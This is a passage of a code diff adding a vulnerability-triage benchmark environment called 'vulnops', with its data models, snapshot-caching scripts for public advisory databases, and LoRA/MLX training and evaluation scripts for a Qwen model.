+        description="Generic value used for label-setting actions",
+    )
+    rationale: str = Field(
+        default="",
+        description="Optional short rationale for debugging and trajectory inspection",
+    )
+class VulnTriageObservation(Observation):
+    """Observation returned after every environment transition."""
+    task_id: str = Field(..., description="Current task identifier")
+    difficulty: str = Field(..., description="Difficulty band for the current task")
+    objective: str = Field(..., description="Concrete task objective")
+    report_summary: str = Field(..., description="Incoming vulnerability report summary")
+    visible_evidence: List[EvidenceItem] = Field(
+        default_factory=list,
+        description="Evidence items currently visible to the agent",
+    )
+    available_evidence: List[str] = Field(
+        default_factory=list,
+        description="Evidence identifiers available to inspect next",
+    )
+    draft: TriageDraft = Field(
+        default_factory=TriageDraft,
+        description="Current structured triage draft",
+    )
+    action_history: List[str] = Field(
+        default_factory=list,
+        description="Compact history of recent agent actions",
+    )
+    steps_remaining: int = Field(..., ge=0, description="Remaining steps in the episode")
+    score_breakdown: Dict[str, float] = Field(
+        default_factory=dict,
+        description="Current normalized grader breakdown",
+    )
+    final_score: Optional[float] = Field(
+        default=None,
+        description="Final submission score when the episode is done",
+    )
+    available_actions: List[str] = Field(
+        default_factory=lambda: [
+            "read_report",
+            "inspect_evidence",
+            "search_nvd_database",
+            "fetch_commit_diff",
+            "message_maintainer",
+            "set_validity",
+            "set_affected_package",
+            "set_affected_versions",
+            "set_severity",
+            "set_exploitability",
+            "set_next_action",
+            "set_missing_information",
+            "request_more_info",
+            "submit_triage",
+        ],
+        description="Action names the agent can choose from",
+    )
+class VulnTriageState(State):
+    """Serializable environment state for inspection and debugging."""
+    task_id: str = Field(..., description="Current task identifier")
+    difficulty: str = Field(..., description="Difficulty band")
+    draft: TriageDraft = Field(default_factory=TriageDraft)
+    revealed_evidence_ids: List[str] = Field(default_factory=list)
+    action_history: List[str] = Field(default_factory=list)
+    steps_remaining: int = Field(..., ge=0)
+    submitted: bool = Field(default=False)
+    final_score: Optional[float] = Field(default=None)
+    score_breakdown: Dict[str, float] = Field(default_factory=dict)

openenv.yaml ADDED Viewed

	@@ -0,0 +1,6 @@

+spec_version: 1
+name: vulnops
+type: space
+runtime: fastapi
+app: server.app:app
+port: 7860

pyproject.toml ADDED Viewed

	@@ -0,0 +1,29 @@

+[build-system]
+requires = ["setuptools>=45", "wheel"]
+build-backend = "setuptools.build_meta"
+[project]
+name = "openenv-vulnops"
+version = "0.1.0"
+description = "Deterministic OpenEnv benchmark for open-source vulnerability operations"
+readme = "README.md"
+requires-python = ">=3.10"
+dependencies = [
+    "openenv-core[core]>=0.2.3",
+]
+[project.optional-dependencies]
+dev = [
+    "pytest>=8.0.0",
+]
+train = [
+    "peft>=0.14.0",
+]
+[project.scripts]
+server = "vulnops.server.app:main"
+[tool.setuptools]
+include-package-data = true
+packages = ["vulnops", "vulnops.server"]
+package-dir = { "vulnops" = ".", "vulnops.server" = "server" }

scripts/build_snapshot_cache.py ADDED Viewed

	@@ -0,0 +1,139 @@

+"""Build a provider-backed fallback snapshot cache."""
+from __future__ import annotations
+import json
+from pathlib import Path
+import sys
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from typing import Dict, List
+import requests
+ROOT = Path(__file__).resolve().parent.parent
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from server.cases import EPSS_URL, NVD_CVE_URL, OSV_VULN_URL, _extract_cve_id
+SNAPSHOT_DIR = ROOT / "data" / "snapshots"
+INDEX_PATH = ROOT / "data" / "snapshot_index.json"
+PYPA_TREE_URL = "https://api.github.com/repos/pypa/advisory-database/git/trees/main?recursive=1"
+def get_candidate_ids(limit: int = 200) -> List[str]:
+    response = requests.get(PYPA_TREE_URL, timeout=30)
+    response.raise_for_status()
+    tree = response.json().get("tree", [])
+    ids = []
+    for item in tree:
+        path = item.get("path", "")
+        if not path.startswith("vulns/") or not path.endswith(".yaml"):
+            continue
+        ident = path.rsplit("/", 1)[-1][:-5]
+        if ident.startswith(("PYSEC-", "GHSA-")):
+            ids.append(ident)
+    return ids[: limit * 4]
+def fetch_json(url: str, *, params: Dict[str, str] | None = None) -> Dict:
+    response = requests.get(url, params=params, timeout=20)
+    response.raise_for_status()
+    return response.json()
+def build_snapshot(osv_id: str) -> Dict | None:
+    osv = fetch_json(OSV_VULN_URL.format(osv_id=osv_id))
+    if not osv.get("affected"):
+        return None
+    cve_id = _extract_cve_id(osv)
+    snapshot = {
+        "id": osv.get("id"),
+        "summary": osv.get("summary"),
+        "details": osv.get("details"),
+        "aliases": osv.get("aliases", []),
+        "references": osv.get("references", []),
+        "affected": osv.get("affected", []),
+        "severity": "MEDIUM",
+        "nvd_description": "",
+        "epss_score": 0.0,
+        "epss_percentile": 0.0,
+    }
+    if cve_id:
+        try:
+            nvd = fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
+            vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
+            metrics = vulnerability.get("metrics", {})
+            severity = None
+            for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
+                if key in metrics:
+                    item = metrics[key][0]
+                    severity = (
+                        item.get("cvssData", {}).get("baseSeverity")
+                        or item.get("baseSeverity")
+                    )
+                    if severity:
+                        break
+            descriptions = vulnerability.get("descriptions", [])
+            snapshot["severity"] = severity or snapshot["severity"]
+            snapshot["nvd_description"] = next(
+                (
+                    desc.get("value", "")
+                    for desc in descriptions
+                    if desc.get("lang") == "en"
+                ),
+                descriptions[0].get("value", "") if descriptions else "",
+            )
+        except Exception:
+            pass
+        try:
+            epss = fetch_json(EPSS_URL, params={"cve": cve_id})
+            item = (epss.get("data") or [{}])[0]
+            snapshot["epss_score"] = float(item.get("epss", 0.0) or 0.0)
+            snapshot["epss_percentile"] = float(item.get("percentile", 0.0) or 0.0)
+        except Exception:
+            pass
+    return snapshot
+def main(target_count: int = 200) -> None:
+    SNAPSHOT_DIR.mkdir(parents=True, exist_ok=True)
+    candidates = get_candidate_ids(target_count)[: max(target_count + 40, 240)]
+    saved = []
+    with ThreadPoolExecutor(max_workers=12) as executor:
+        futures = {executor.submit(build_snapshot, osv_id): osv_id for osv_id in candidates}
+        for future in as_completed(futures):
+            if len(saved) >= target_count:
+                executor.shutdown(wait=False, cancel_futures=True)
+                break
+            osv_id = futures[future]
+            try:
+                snapshot = future.result()
+            except Exception:
+                continue
+            if not snapshot:
+                continue
+            out_path = SNAPSHOT_DIR / f"{osv_id}.json"
+            out_path.write_text(json.dumps(snapshot, indent=2, sort_keys=True))
+            saved.append(
+                {
+                    "osv_id": osv_id,
+                    "file": str(out_path.relative_to(ROOT)),
+                    "cve_id": _extract_cve_id(snapshot),
+                    "package": (snapshot.get("affected") or [{}])[0].get("package", {}).get("name", ""),
+                }
+            )
+    INDEX_PATH.parent.mkdir(parents=True, exist_ok=True)
+    saved = sorted(saved, key=lambda item: item["osv_id"])
+    INDEX_PATH.write_text(json.dumps({"count": len(saved), "snapshots": saved}, indent=2))
+    print(f"Saved {len(saved)} snapshots to {SNAPSHOT_DIR}")
+if __name__ == "__main__":
+    main()

scripts/compare_training_speeds.py ADDED Viewed

	@@ -0,0 +1,38 @@

+"""Compare saved PyTorch and MLX speed summaries."""
+from __future__ import annotations
+import json
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+PT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
+MLX_PATH = ROOT / "artifacts" / "mlx_qwen3_4b" / "metrics" / "speed_mlx.json"
+OUT_PATH = ROOT / "artifacts" / "speed_comparison.json"
+def load(path: Path) -> dict:
+    return json.loads(path.read_text(encoding="utf-8"))
+def main() -> None:
+    pt = load(PT_PATH)
+    mlx = load(MLX_PATH)
+    pt_s = pt.get("latest_seconds_per_step")
+    mlx_s = mlx.get("latest_seconds_per_step")
+    payload = {
+        "pytorch_mps_seconds_per_step": pt_s,
+        "mlx_seconds_per_step": mlx_s,
+        "speedup_factor_mlx_vs_pytorch": (pt_s / mlx_s) if pt_s and mlx_s else None,
+        "notes": [
+            "PyTorch baseline uses the existing PEFT/Transformers trainer on MPS.",
+            "MLX benchmark uses a lower-memory LoRA config: 8 layers and max_seq_length 1024.",
+        ],
+    }
+    OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/dump_mlx_generation.py ADDED Viewed

	@@ -0,0 +1,63 @@

+"""Dump a full raw generation from the MLX model for one vulnops observation."""
+from __future__ import annotations
+import argparse
+import json
+import sys
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from mlx_lm import generate, load
+from mlx_lm.sample_utils import make_sampler
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+from training_utils import render_prompt
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--adapter-path", default="artifacts/mlx_qwen3_4b/adapters")
+    parser.add_argument("--task-id", default="task_easy_guarddog")
+    parser.add_argument("--max-tokens", type=int, default=2048)
+    parser.add_argument(
+        "--output-file",
+        default="artifacts/mlx_qwen3_4b/inspection/task_easy_guarddog_latest_raw_output.json",
+    )
+    args = parser.parse_args()
+    model, tokenizer = load(args.model, adapter_path=args.adapter_path)
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=args.task_id).model_dump()
+    prompt = render_prompt(observation, "Return only the best next action in JSON.")
+    raw_output = generate(
+        model,
+        tokenizer,
+        prompt=prompt,
+        verbose=False,
+        max_tokens=args.max_tokens,
+        sampler=make_sampler(temp=0.0),
+    )
+    output_path = Path(args.output_file)
+    if not output_path.is_absolute():
+        output_path = (ROOT / output_path).resolve()
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    payload = {
+        "task_id": args.task_id,
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "max_tokens": args.max_tokens,
+        "prompt": prompt,
+        "raw_output": raw_output,
+    }
+    output_path.write_text(json.dumps(payload, indent=2) + "\n", encoding="utf-8")
+    print(output_path)
+if __name__ == "__main__":
+    main()

scripts/evaluate_lora.py ADDED Viewed

	@@ -0,0 +1,133 @@

+"""Evaluate a base or LoRA-adapted model on the local vulnops environment."""
+from __future__ import annotations
+import argparse
+import json
+import sys
+from pathlib import Path
+from typing import Dict, List
+import torch
+from transformers import AutoModelForCausalLM, AutoTokenizer
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from server.cases import TASK_ORDER
+from training_utils import (
+    detect_device,
+    maybe_parse_action,
+    preferred_torch_dtype,
+    render_prompt,
+    set_default_env,
+)
+from models import VulnTriageAction
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+def load_model(model_name: str, adapter_path: str | None, output_root: Path):
+    set_default_env(output_root)
+    device = detect_device()
+    torch_dtype = preferred_torch_dtype(device)
+    tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
+    if tokenizer.pad_token is None:
+        tokenizer.pad_token = tokenizer.eos_token
+    model = AutoModelForCausalLM.from_pretrained(
+        model_name,
+        torch_dtype=torch_dtype,
+        trust_remote_code=True,
+        low_cpu_mem_usage=True,
+    )
+    if adapter_path:
+        try:
+            from peft import PeftModel
+        except ImportError as exc:
+            raise RuntimeError("peft is required to evaluate a LoRA adapter.") from exc
+        model = PeftModel.from_pretrained(model, adapter_path)
+    if device in {"cuda", "mps"}:
+        model.to(device)
+    model.eval()
+    return model, tokenizer, device
+@torch.inference_mode()
+def next_action(model, tokenizer, device: str, observation: Dict[str, object]) -> Dict[str, object]:
+    prompt = render_prompt(
+        observation=observation,
+        prompt_variant="Return only the best next action in JSON.",
+    )
+    encoded = tokenizer(prompt, return_tensors="pt")
+    encoded = {key: value.to(device) for key, value in encoded.items()}
+    generated = model.generate(
+        **encoded,
+        max_new_tokens=192,
+        do_sample=False,
+        temperature=None,
+        pad_token_id=tokenizer.pad_token_id,
+        eos_token_id=tokenizer.eos_token_id,
+    )
+    prompt_length = encoded["input_ids"].shape[1]
+    output_text = tokenizer.decode(generated[0][prompt_length:], skip_special_tokens=True).strip()
+    payload = maybe_parse_action(output_text)
+    if payload is None:
+        return {
+            "action_type": "submit_triage",
+            "rationale": f"Fallback because model output could not be parsed: {output_text[:120]}",
+        }
+    return payload
+def run_episode(model, tokenizer, device: str, task_id: str) -> Dict[str, object]:
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=task_id).model_dump()
+    actions: List[Dict[str, object]] = []
+    while not observation["done"]:
+        action_payload = next_action(model, tokenizer, device, observation)
+        action = VulnTriageAction.model_validate(action_payload)
+        actions.append(action.model_dump(exclude_none=True))
+        observation = env.step(action).model_dump()
+    return {
+        "task_id": task_id,
+        "difficulty": observation["difficulty"],
+        "final_score": float(observation.get("final_score") or 0.0),
+        "score_breakdown": observation["score_breakdown"],
+        "steps_used": len(actions),
+        "actions": actions,
+    }
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--adapter-path")
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--output-json")
+    args = parser.parse_args()
+    output_root = (ROOT / args.output_root).resolve()
+    model, tokenizer, device = load_model(args.model, args.adapter_path, output_root)
+    episodes = [run_episode(model, tokenizer, device, task_id) for task_id in TASK_ORDER]
+    average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
+    payload = {
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "device": device,
+        "average_score": average_score,
+        "episodes": episodes,
+    }
+    if args.output_json:
+        output_path = Path(args.output_json)
+        if not output_path.is_absolute():
+            output_path = (ROOT / output_path).resolve()
+        output_path.parent.mkdir(parents=True, exist_ok=True)
+        output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/evaluate_mlx.py ADDED Viewed

	@@ -0,0 +1,137 @@

+"""Evaluate base or MLX-adapted Qwen models on the local vulnops environment."""
+from __future__ import annotations
+import argparse
+import json
+import re
+import sys
+from pathlib import Path
+from typing import Dict, List
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from mlx_lm import generate, load
+from mlx_lm.sample_utils import make_sampler
+from models import VulnTriageAction
+from server.cases import TASK_ORDER
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+from training_utils import render_prompt
+THINK_BLOCK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)
+def extract_last_json_object(text: str) -> str | None:
+    cleaned = THINK_BLOCK_RE.sub("", text).strip()
+    start = cleaned.find("{")
+    if start == -1:
+        return None
+    depth = 0
+    in_string = False
+    escape = False
+    last_candidate = None
+    candidate_start = None
+    for index, ch in enumerate(cleaned):
+        if ch == "\\" and in_string and not escape:
+            escape = True
+            continue
+        if ch == '"' and not escape:
+            in_string = not in_string
+        escape = False
+        if in_string:
+            continue
+        if ch == "{":
+            if depth == 0:
+                candidate_start = index
+            depth += 1
+        elif ch == "}":
+            depth -= 1
+            if depth == 0 and candidate_start is not None:
+                last_candidate = cleaned[candidate_start : index + 1]
+    return last_candidate
+def parse_action_output(text: str) -> Dict[str, object] | None:
+    candidate = extract_last_json_object(text)
+    if candidate is None:
+        return None
+    try:
+        payload = json.loads(candidate)
+        action = VulnTriageAction.model_validate(payload)
+    except Exception:
+        return None
+    return action.model_dump(exclude_none=True)
+def next_action(model, tokenizer, observation: Dict[str, object]) -> Dict[str, object]:
+    prompt = render_prompt(
+        observation=observation,
+        prompt_variant="Return only the best next action in JSON.",
+    )
+    output = generate(
+        model,
+        tokenizer,
+        prompt=prompt,
+        verbose=False,
+        max_tokens=192,
+        sampler=make_sampler(temp=0.0),
+    )
+    payload = parse_action_output(output)
+    if payload is None:
+        return {
+            "action_type": "submit_triage",
+            "rationale": f"Fallback because model output could not be parsed: {output[:120]}",
+        }
+    return payload
+def run_episode(model, tokenizer, task_id: str) -> Dict[str, object]:
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=task_id).model_dump()
+    actions: List[Dict[str, object]] = []
+    while not observation["done"]:
+        action_payload = next_action(model, tokenizer, observation)
+        action = VulnTriageAction.model_validate(action_payload)
+        actions.append(action.model_dump(exclude_none=True))
+        observation = env.step(action).model_dump()
+    return {
+        "task_id": task_id,
+        "difficulty": observation["difficulty"],
+        "final_score": float(observation.get("final_score") or 0.0),
+        "score_breakdown": observation["score_breakdown"],
+        "steps_used": len(actions),
+        "actions": actions,
+    }
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--adapter-path")
+    parser.add_argument("--output-json")
+    args = parser.parse_args()
+    model, tokenizer = load(args.model, adapter_path=args.adapter_path)
+    episodes = [run_episode(model, tokenizer, task_id) for task_id in TASK_ORDER]
+    average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
+    payload = {
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "average_score": average_score,
+        "episodes": episodes,
+    }
+    if args.output_json:
+        out = Path(args.output_json)
+        if not out.is_absolute():
+            out = (ROOT / out).resolve()
+        out.parent.mkdir(parents=True, exist_ok=True)
+        out.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/generate_sft_data.py ADDED Viewed

	@@ -0,0 +1,116 @@

+"""Generate resumable SFT data from deterministic heuristic rollouts."""
+from __future__ import annotations
+import argparse
+import json
+import sys
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from training_utils import (
+    PROMPT_VARIANTS,
+    append_jsonl,
+    build_text_example,
+    generate_heuristic_transitions,
+    split_for_key,
+    write_json,
+)
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--augmentations", type=int, default=12)
+    parser.add_argument("--eval-ratio", type=float, default=0.2)
+    parser.add_argument("--force", action="store_true")
+    args = parser.parse_args()
+    output_root = (ROOT / args.output_root).resolve()
+    data_dir = output_root / "data"
+    transitions_path = data_dir / "transitions.jsonl"
+    train_path = data_dir / "train.jsonl"
+    eval_path = data_dir / "eval.jsonl"
+    manifest_path = output_root / "run_manifest.json"
+    if args.force:
+        for path in (transitions_path, train_path, eval_path):
+            if path.exists():
+                path.unlink()
+    if transitions_path.exists() and train_path.exists() and eval_path.exists():
+        print(json.dumps({"status": "already_exists", "output_root": str(output_root)}, indent=2))
+        return
+    transition_count = 0
+    train_examples = 0
+    eval_examples = 0
+    for transition in generate_heuristic_transitions():
+        record = {
+            "task_id": transition.task_id,
+            "difficulty": transition.difficulty,
+            "step_index": transition.step_index,
+            "observation": transition.observation,
+            "action": transition.action,
+            "reward_after_action": transition.reward_after_action,
+            "score_after_action": transition.score_after_action,
+            "done": transition.done,
+        }
+        append_jsonl(transitions_path, record)
+        transition_count += 1
+        for augmentation_index in range(args.augmentations):
+            prompt_variant = PROMPT_VARIANTS[augmentation_index % len(PROMPT_VARIANTS)]
+            example = build_text_example(
+                observation=transition.observation,
+                action=transition.action,
+                prompt_variant=prompt_variant,
+            )
+            example_record = {
+                "id": f"{transition.task_id}-step{transition.step_index}-aug{augmentation_index}",
+                "task_id": transition.task_id,
+                "difficulty": transition.difficulty,
+                "step_index": transition.step_index,
+                "prompt_variant": prompt_variant,
+                **example,
+            }
+            split = split_for_key(example_record["id"], args.eval_ratio)
+            append_jsonl(train_path if split == "train" else eval_path, example_record)
+            if split == "train":
+                train_examples += 1
+            else:
+                eval_examples += 1
+        write_json(
+            manifest_path,
+            {
+                "status": "data_ready",
+                "output_root": str(output_root),
+                "transition_count": transition_count,
+                "train_examples": train_examples,
+                "eval_examples": eval_examples,
+                "augmentations": args.augmentations,
+                "eval_ratio": args.eval_ratio,
+            },
+        )
+    print(
+        json.dumps(
+            {
+                "status": "ok",
+                "output_root": str(output_root),
+                "transition_count": transition_count,
+                "train_examples": train_examples,
+                "eval_examples": eval_examples,
+            },
+            indent=2,
+        )
+    )
+if __name__ == "__main__":
+    main()

scripts/prepare_mlx_data.py ADDED Viewed

	@@ -0,0 +1,145 @@

+"""Prepare MLX-LM-compatible train/valid files from existing SFT data."""
+from __future__ import annotations
+import argparse
+import json
+from pathlib import Path
+from typing import Dict, List
+from transformers import AutoTokenizer
+ROOT = Path(__file__).resolve().parents[1]
+TRUNCATION_MARKER = "\n...[truncated observation]...\n"
+def load_jsonl(path: Path) -> List[Dict[str, object]]:
+    with path.open("r", encoding="utf-8") as handle:
+        return [json.loads(line) for line in handle if line.strip()]
+def dump_jsonl(path: Path, rows: List[Dict[str, object]]) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with path.open("w", encoding="utf-8") as handle:
+        for row in rows:
+            handle.write(json.dumps(row, sort_keys=True) + "\n")
+def trim_prompt_to_budget(prompt: str, tokenizer, budget: int) -> str:
+    prompt_ids = tokenizer.encode(prompt, add_special_tokens=False)
+    if len(prompt_ids) <= budget:
+        return prompt
+    marker_ids = tokenizer.encode(TRUNCATION_MARKER, add_special_tokens=False)
+    marker_len = len(marker_ids)
+    if budget <= marker_len + 8:
+        return tokenizer.decode(prompt_ids[-budget:])
+    remaining = budget - marker_len
+    head_len = max(1, int(remaining * 0.55))
+    tail_len = max(1, remaining - head_len)
+    trimmed_ids = prompt_ids[:head_len] + marker_ids + prompt_ids[-tail_len:]
+    if len(trimmed_ids) > budget:
+        trimmed_ids = trimmed_ids[:budget]
+    return tokenizer.decode(trimmed_ids, skip_special_tokens=False)
+def rendered_length(prompt: str, completion: str, tokenizer) -> int:
+    messages = [
+        {"role": "user", "content": prompt},
+        {"role": "assistant", "content": completion},
+    ]
+    return len(tokenizer.apply_chat_template(messages, return_dict=False))
+def normalize_record(record: Dict[str, object], tokenizer, max_seq_length: int) -> tuple[Dict[str, object] | None, Dict[str, int]]:
+    prompt = str(record["prompt"])
+    completion = str(record["completion"])
+    stats = {"trimmed": 0, "dropped": 0}
+    completion_ids = tokenizer.encode(completion, add_special_tokens=False)
+    prompt_budget = max_seq_length - len(completion_ids) - 32
+    if prompt_budget <= 0:
+        stats["dropped"] = 1
+        return None, stats
+    normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
+    while rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length and prompt_budget > 64:
+        prompt_budget = max(64, int(prompt_budget * 0.9))
+        normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
+    if rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length:
+        stats["dropped"] = 1
+        return None, stats
+    if normalized_prompt != prompt:
+        stats["trimmed"] = 1
+    text = f"{normalized_prompt}\n{completion}"
+    normalized = dict(record)
+    normalized["prompt"] = normalized_prompt
+    normalized["text"] = text
+    return normalized, stats
+def transform_split(src: Path, dst: Path, tokenizer, max_seq_length: int) -> Dict[str, int]:
+    rows = load_jsonl(src)
+    normalized_rows: List[Dict[str, object]] = []
+    stats = {"input_examples": len(rows), "written_examples": 0, "trimmed_examples": 0, "dropped_examples": 0}
+    for row in rows:
+        normalized, row_stats = normalize_record(row, tokenizer, max_seq_length)
+        stats["trimmed_examples"] += row_stats["trimmed"]
+        stats["dropped_examples"] += row_stats["dropped"]
+        if normalized is not None:
+            normalized_rows.append(normalized)
+    stats["written_examples"] = len(normalized_rows)
+    dump_jsonl(dst, normalized_rows)
+    return stats
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
+    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b/data")
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--max-seq-length", type=int, default=1024)
+    parser.add_argument("--include-valid", action="store_true")
+    parser.add_argument("--force", action="store_true")
+    args = parser.parse_args()
+    source_root = (ROOT / args.source_root).resolve()
+    output_root = (ROOT / args.output_root).resolve()
+    output_root.mkdir(parents=True, exist_ok=True)
+    tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
+    mapping = {source_root / "train.jsonl": output_root / "train.jsonl"}
+    if args.include_valid:
+        mapping[source_root / "eval.jsonl"] = output_root / "valid.jsonl"
+    summary: Dict[str, object] = {
+        "model": args.model,
+        "max_seq_length": args.max_seq_length,
+        "splits": {},
+    }
+    for src, dst in mapping.items():
+        if not src.exists():
+            raise FileNotFoundError(f"Missing source file: {src}")
+        if dst.exists() and not args.force:
+            continue
+        summary["splits"][dst.stem] = transform_split(src, dst, tokenizer, args.max_seq_length)
+    valid_path = output_root / "valid.jsonl"
+    if not args.include_valid and valid_path.exists():
+        valid_path.unlink()
+    summary_path = output_root.parent / "prepare_stats.json"
+    summary_path.write_text(json.dumps(summary, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(output_root)
+    print(json.dumps(summary, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/run_lora_pipeline.py ADDED Viewed

	@@ -0,0 +1,135 @@

+"""Run the full resumable local LoRA pipeline."""
+from __future__ import annotations
+import argparse
+import json
+import subprocess
+import sys
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from training_utils import latest_checkpoint, write_json
+def run_step(name: str, command: list[str], log_path: Path, output_root: Path) -> None:
+    log_path.parent.mkdir(parents=True, exist_ok=True)
+    with log_path.open("a", encoding="utf-8") as log_handle:
+        log_handle.write(f"\n===== {name} =====\n")
+        log_handle.flush()
+        write_json(
+            output_root / "run_manifest.json",
+            {
+                "status": "running_step",
+                "current_step": name,
+                "command": command,
+                "latest_checkpoint": str(latest_checkpoint(output_root / "checkpoints")) if (output_root / "checkpoints").exists() else None,
+            },
+        )
+        process = subprocess.run(command, stdout=log_handle, stderr=subprocess.STDOUT, text=True)
+    if process.returncode != 0:
+        raise SystemExit(process.returncode)
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--augmentations", type=int, default=12)
+    parser.add_argument("--skip-base-eval", action="store_true")
+    args = parser.parse_args()
+    output_root = (ROOT / args.output_root).resolve()
+    logs_dir = output_root / "logs"
+    output_root.mkdir(parents=True, exist_ok=True)
+    if not args.skip_base_eval and not (output_root / "metrics" / "eval_before.json").exists():
+        run_step(
+            "eval_base",
+            [
+                sys.executable,
+                "scripts/evaluate_lora.py",
+                "--model",
+                args.model,
+                "--output-root",
+                str(output_root),
+                "--output-json",
+                str(output_root / "metrics" / "eval_before.json"),
+            ],
+            logs_dir / "eval_base.log",
+            output_root,
+        )
+    if not (output_root / "data" / "train.jsonl").exists():
+        run_step(
+            "generate_data",
+            [
+                sys.executable,
+                "scripts/generate_sft_data.py",
+                "--output-root",
+                str(output_root),
+                "--augmentations",
+                str(args.augmentations),
+            ],
+            logs_dir / "generate_data.log",
+            output_root,
+        )
+    run_step(
+        "train_lora",
+        [
+            sys.executable,
+            "scripts/train_lora_sft.py",
+            "--model",
+            args.model,
+            "--output-root",
+            str(output_root),
+        ],
+        logs_dir / "train_lora.log",
+        output_root,
+    )
+    run_step(
+        "eval_adapter",
+        [
+            sys.executable,
+            "scripts/evaluate_lora.py",
+            "--model",
+            args.model,
+            "--adapter-path",
+            str(output_root / "adapter"),
+            "--output-root",
+            str(output_root),
+            "--output-json",
+            str(output_root / "metrics" / "eval_after.json"),
+        ],
+        logs_dir / "eval_adapter.log",
+        output_root,
+    )
+    write_json(
+        output_root / "run_manifest.json",
+        {
+            "status": "finished",
+            "output_root": str(output_root),
+            "eval_before": str(output_root / "metrics" / "eval_before.json"),
+            "training_summary": str(output_root / "training_summary.json"),
+            "eval_after": str(output_root / "metrics" / "eval_after.json"),
+        },
+    )
+    print(
+        json.dumps(
+            {
+                "status": "finished",
+                "output_root": str(output_root),
+            },
+            indent=2,
+        )
+    )
+if __name__ == "__main__":
+    main()

scripts/run_mlx_benchmark.sh ADDED Viewed

	@@ -0,0 +1,29 @@

+#!/bin/zsh
+set -euo pipefail
+ROOT="/Users/adithyavardhan/Tweeks/hack"
+cd "$ROOT"
+python scripts/prepare_mlx_data.py --force
+mkdir -p artifacts/mlx_qwen3_4b/logs artifacts/mlx_qwen3_4b/metrics artifacts/mlx_qwen3_4b/adapters
+python -m mlx_lm lora \
+  --model Qwen/Qwen3.5-4B \
+  --train \
+  --data "$ROOT/artifacts/mlx_qwen3_4b/data" \
+  --mask-prompt \
+  --num-layers 8 \
+  --batch-size 1 \
+  --iters 10 \
+  --val-batches 2 \
+  --learning-rate 5e-5 \
+  --steps-per-report 1 \
+  --steps-per-eval 1000 \
+  --save-every 10 \
+  --grad-accumulation-steps 8 \
+  --grad-checkpoint \
+  --adapter-path "$ROOT/artifacts/mlx_qwen3_4b/adapters" \
+  --max-seq-length 1024 \
+  > "$ROOT/artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log" 2>&1
+python scripts/save_mlx_speed.py

scripts/run_mlx_training.py ADDED Viewed

	@@ -0,0 +1,147 @@

+"""Run MLX LoRA training as the default local Mac training path."""
+from __future__ import annotations
+import argparse
+import json
+import shlex
+import subprocess
+import sys
+from pathlib import Path
